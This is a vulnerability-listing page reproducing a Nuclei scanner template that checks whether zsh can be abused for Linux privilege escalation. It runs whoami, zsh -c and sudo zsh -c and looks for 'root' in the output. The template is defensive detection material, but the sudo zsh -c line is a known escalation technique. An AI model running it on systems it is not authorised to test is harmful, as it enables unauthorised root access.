privesc-zsh: Zsh - Privilege Escalation

日期: 2025-08-01 | 影响软件: Zsh | POC: 已公开

漏洞描述

zsh is a powerful and feature-rich shell for Unix-like operating systems. It offers advanced interactive features, extensive customization options, and robust scripting capabilities

PoC代码[已公开]

id: privesc-zsh

info:
  name: Zsh - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    zsh is a powerful and feature-rich shell for Unix-like operating systems. It offers advanced interactive features, extensive customization options, and robust scripting capabilities
  reference:
    - https://gtfobins.github.io/gtfobins/zsh/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,zsh,privesc,local

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      zsh -c 'whoami'

  - engine:
      - sh
      - bash
    source: |
      sudo zsh -c 'whoami'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4a0a00473045022050b480effa61cca87a448d9d596f99f0c967326e7d6e05c490d3fed4ba6c7c350221009d82105b746db8f33a423aebcf70f709f515494353e8662ccda633968de1c3e2:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./code/privilege-escalation/linux/binary/privesc-zsh.yaml